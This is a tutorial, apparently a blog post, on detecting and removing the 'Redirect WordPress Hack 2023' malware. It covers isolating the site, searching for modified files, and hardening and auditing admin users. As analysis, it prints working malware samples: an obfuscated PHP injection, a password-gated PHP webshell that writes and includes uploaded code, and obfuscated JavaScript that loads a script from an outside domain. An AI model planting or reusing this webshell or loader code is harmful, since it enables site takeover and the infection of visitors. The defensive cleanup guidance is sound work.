WordPress is by far the most widely used CMS (Content Management System), for both blogs and online stores (with the WooCommerce module), which also makes it the platform most targeted by attacks (hacking). One of the most common attacks redirects the compromised website to other web pages. "Redirect WordPress Hack 2023" is a relatively new piece of malware that redirects the entire site to spam web pages, which in turn can infect visitors' computers.
If your WordPress site is being redirected to another site, it has already fallen victim to the well-known redirect hack.
In this tutorial you will find the information and practical tips you need to clean a website infected with the Redirect WordPress Hack (redirect virus). You can ask for additional information or help in the comments.
Detecting the virus that redirects WordPress sites
A sudden, unexplained drop in traffic, in the number of orders (for online stores) or in advertising revenue is the first sign that something is wrong. The "Redirect WordPress Hack 2023" (redirect virus) can also be detected visually: when you open the website, you are redirected to another web page.
From experience, most of these web malware strains target the common browsers: Chrome, Firefox, Edge, Opera. If you use a Mac, these viruses are far less visible in Safari, whose security mechanisms silently block these malicious scripts.
What to do if your website is infected with the Redirect WordPress Hack virus
The first measure is not to panic and not to delete the website. Do not even delete the virus or the infected files in the first phase: they contain valuable information that helps you understand where the security breach is, what the virus has affected and its modus operandi.
Close the website to the public
How do you close an infected website to visitors? The simplest way is to use your DNS manager and delete the "A" record for the domain name, or point it to a non-existent IP. This way visitors are protected from the redirect WordPress hack, which could take them to virus or spam web pages.
If you use Cloudflare as your DNS manager, log in to your account and delete the "A" DNS records for the domain name. The infected domain will be left without an IP and cannot be reached from the Internet.
Copy the website's IP and create a "route" so that only you can access it, from your own computer.
How do you set the real IP of a website on Windows computers?
This method is often used to block access to certain websites, by editing the "hosts" file.
1. Open Notepad or another text editor (with administrator rights) and edit the "hosts" file. It is located at:
C:\Windows\System32\drivers\etc\hosts
2. In the "hosts" file, add a "route" to the real IP of your website, i.e. the IP you deleted above from the DNS manager:
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld
3. Save the file and open the website in the browser.
If the website does not open and you did not make a mistake in the "hosts" file, it is most likely a DNS cache problem.
To clear the DNS cache on Windows, open Command Prompt and run the command:
ipconfig /flushdns
How do you set the real IP of a website on Mac / MacBook computers?
For Mac users it is a little easier to set the real IP of a website.
1. Open the Terminal utility.
2. Run the following command (it requires your system password):
sudo nano /etc/hosts
3. As on Windows, add the real IP of the domain:
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld
4. Save the changes with Ctrl+X, then confirm with Y.
After you have set up the "route", you are the only person who can access the infected website.
Full website backup – files and database
Even though the website is infected with the redirect WordPress hack, the recommendation is to make a full backup of the entire website: files and database. Ideally, save a local copy of both the files in public / public_html and the database.
Identifying the virus and the files modified by Redirect WordPress Hack 2023
The main files targeted are index.php (in the root), and header.php, index.php and footer.php of the active WordPress theme. Check these files manually and look for malicious code or a malware script.
In 2023, one type of "Redirect WordPress Hack" virus placed in index.php code of the following form (I do not recommend executing this code!):
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>
Decoded, this malware script is practically the consequence of the WordPress compromise. It is not the script at the core of the malware application, but it is the script that makes the redirect to the virus web page possible. If we decode the script above, we get:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
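The decoding step described above, reproduced as an added Python example (not the author's code): every $bN value in the sample is base64(uuencode(plaintext)) and the PHP resolves it with convert_uudecode(base64_decode($bN)). Run on the $b0 and $b5 strings quoted from the sample, it recovers sys_get_temp_dir and file_put_contents, which is how the injection writes and then includes a file in the temp directory.

```python
import base64
import binascii

# Layered strings copied verbatim from the index.php sample quoted above
# ($b5 is given there as a concatenation of four pieces).
LAYERED = {
    "b0": "MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==",
    "b5": "MTlGRUw5NV1QPTcxPzhWXU49JjVOPScsYApgCg==",
}


def uudecode_block(data: bytes) -> bytes:
    """Mimic PHP convert_uudecode(): decode each uuencoded line and stop at
    the terminating '`' line; output of all lines is concatenated."""
    out = b""
    for line in data.split(b"\n"):
        if not line or line == b"`":
            break
        out += binascii.a2b_uu(line)
    return out


def decode_layered(value: str) -> str:
    """base64 first, then uudecode: the same order as $b4($b2($bN))."""
    return uudecode_block(base64.b64decode(value)).decode("ascii")


def resolve_all(layered: dict) -> dict:
    """Map every obfuscated variable name to the PHP identifier it hides."""
    return {name: decode_layered(v) for name, v in layered.items()}


if __name__ == "__main__":
    for name, plain in resolve_all(LAYERED).items():
        print(f"${name} -> {plain}")
```

Drop the remaining $bN strings from the sample into LAYERED to recover the full list of functions, POST parameter names and injected markup it uses.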

To identify all the files on the server containing this code, it is good to have SSH access to the server so that you can run the checks and file administration commands on Linux.
Below are two commands that are very helpful for identifying recently modified files and files containing a particular piece of code (string).
How do you see the PHP files modified in the last 24 hours, or in another time range, on Linux?
The "find" command is very simple to use and lets you set the time period, the path to search in and the type of files.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"
In the output you will receive the date and time at which each file was modified, its read / write / execute permissions (chmod) and the user / group it belongs to.
If you want to check several days back, change the value "-mtime -1", or use "-mmin -360" for minutes (6 hours).
How do you search for a code (string) inside PHP and JavaScript files?
The "find" command line with which you can quickly find all PHP or JavaScript files containing a particular string is as follows:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +
The command searches for and lists the .php and .js files containing "uJjBRODYsU".
With the help of the two commands above you will easily find which files have been modified recently and which contain malware code.
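The two checks above combined into one triage pass, as an added Python example (not the author's commands): it walks the web root, flags .php/.js files modified in the last N hours, files named like the wp-log-*.php webshell, and files matching indicators taken from the samples on this page, and reports the mtime, permissions and owner that ls -l would show. The regexes are constructed here; the concatenated-function-name pattern is a heuristic and may need tuning on large code bases.

```python
import os
import re
import stat
import time
from datetime import datetime

# Indicators taken from the samples quoted on this page: the base64 fragment
# "uJjBRODYsU" from the index.php injection, the 'er'.'ro'.'r_' style function
# name concatenation used by both samples, and the temp-file include of the
# wp-log-*.php webshell. The regexes themselves are constructed for this scan.
INDICATORS = {
    "b64-fragment": re.compile(r"uJjBRODYsU"),
    "concat-funcname": re.compile(r"(?:[\"'][a-z_0-9]{1,5}[\"']\s*\.\s*){3,}[\"'][a-z_0-9]{1,5}[\"']"),
    "tmp-include": re.compile(r'file_put_contents\(\$a\."/tpfile"'),
}
SUSPICIOUS_NAME = re.compile(r"^wp-log-[A-Za-z0-9]+\.php$")
EXTENSIONS = (".php", ".js")


def scan(webroot, hours=24):
    """Return one record per .php/.js file under webroot that was modified in
    the last `hours` hours, has a wp-log-*.php name, or matches an indicator."""
    cutoff = time.time() - hours * 3600
    hits = []
    for root, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.endswith(EXTENSIONS):
                continue
            path = os.path.join(root, name)
            st = os.stat(path)
            reasons = []
            if st.st_mtime >= cutoff:
                reasons.append("modified-recently")
            if SUSPICIOUS_NAME.match(name):
                reasons.append("wp-log-name")
            with open(path, encoding="utf-8", errors="replace") as fh:
                data = fh.read()
            reasons += [k for k, rx in INDICATORS.items() if rx.search(data)]
            if reasons:
                hits.append({
                    "path": path,
                    "mtime": datetime.fromtimestamp(st.st_mtime).isoformat(timespec="seconds"),
                    "mode": stat.filemode(st.st_mode),  # same permission string as ls -l
                    "uid": st.st_uid,
                    "reasons": reasons,
                })
    return hits
```

Call scan("/your/web/path") and review each record's reasons before deleting anything; a file that is only "modified-recently" may be a legitimate update.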
Remove the malware from the modified files without damaging the legitimate code. In my scenario, the malware code was placed before the opening <head> tag.
When running the first "find" command, it is quite possible to discover new files on the server that are not part of WordPress and were not put there by you. These files are what propagate the WordPress Hack Redirect virus.
In the scenario I investigated, files of the form "wp-log-nOXdgD.php" appeared on the server. These are "generated" files which also contain the malware code used by the redirect virus.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}
The purpose of the "wp-log-*" files is to spread the Redirect Hack virus to other websites hosted on the server. It is a "webshell" type of malware code, composed of a basic section (in which some encoded variables are defined) and an execution section through which the attacker tries to upload and execute malware code on the system.
If there is a POST variable called 'bh' and its MD5 hash equals "8f1f964a4b4d8d1ac3f0386693d28d03", the script writes the base64-encoded content of another variable called 'b3', after decoding it, into a temporary file and then tries to include that temporary file.
If there is a POST or GET variable called 'tick', the script responds with the MD5 hash of the string "885".
To identify all the files on the server containing this code, choose a string that is common to them, then run the "find" command (similar to the one above). Delete all files containing this malware code.
The security breach exploited by Redirect WordPress Hack
Most likely this redirect virus gets in by compromising a WordPress administrator account, or through a vulnerable plugin which allows the addition of users with administrator privileges.
On most websites built on WordPress, the theme or plugin files can be edited from the administration interface (Dashboard). Thus a malicious person can add to the theme files the malware that generates the scripts presented above.
An example of such malware is this:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var 
d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>
JavaScript identified in the WordPress theme header, immediately after the opening <head> tag.
It is quite difficult to decipher this JavaScript, but it is obvious that it loads another web address, most likely to fetch other scripts that create the "wp-log-*" files I talked about above.
Search for and delete this code from all affected PHP files.
As far as I could figure out, this code was added manually by a new user with administrator privileges.
So, to prevent malware from being added through the Dashboard, it is best to disable the editing of theme / plugin files in the Dashboard.
Edit the wp-config.php file and add the lines:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);
After this change, no WordPress user will be able to edit files from the Dashboard.
Check the users with the administrator role
Below is an SQL query you can use to find users with the administrator role on the WordPress platform:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'
This query returns all users in the wp_users table who have been assigned the administrator role. It joins the wp_usermeta table to search the 'wp_capabilities' meta key, which holds the users' role information. If your installation uses a table prefix other than wp_, both the table names and the meta key carry that prefix instead.
Another method is to check from Dashboard → Users → All Users → Administrator. But in practice a user can be hidden from the Dashboard panel, so the best way to see the "Administrator" users in WordPress is the SQL command above.
In my case, I identified in the database a user with the name "wp-import-user". Quite suggestive.
From here you can see the date and time when the WordPress user was created. The username is also very important, because you can search for it in the server logs; this way you can see all the activity of this user.
Delete the users with the administrator role that you do not recognize, then change the passwords of all users with administrative roles: Editor, Author, Administrator.
Change the password of the SQL user for the affected website's database.
After taking these steps, the website can be reopened to all users.
Remember, however, that what I presented above is just one of the thousands of ways a website can end up with the redirect WordPress hack in 2023.
If your website has been infected and you need help, or if you have any questions, the comment box is open.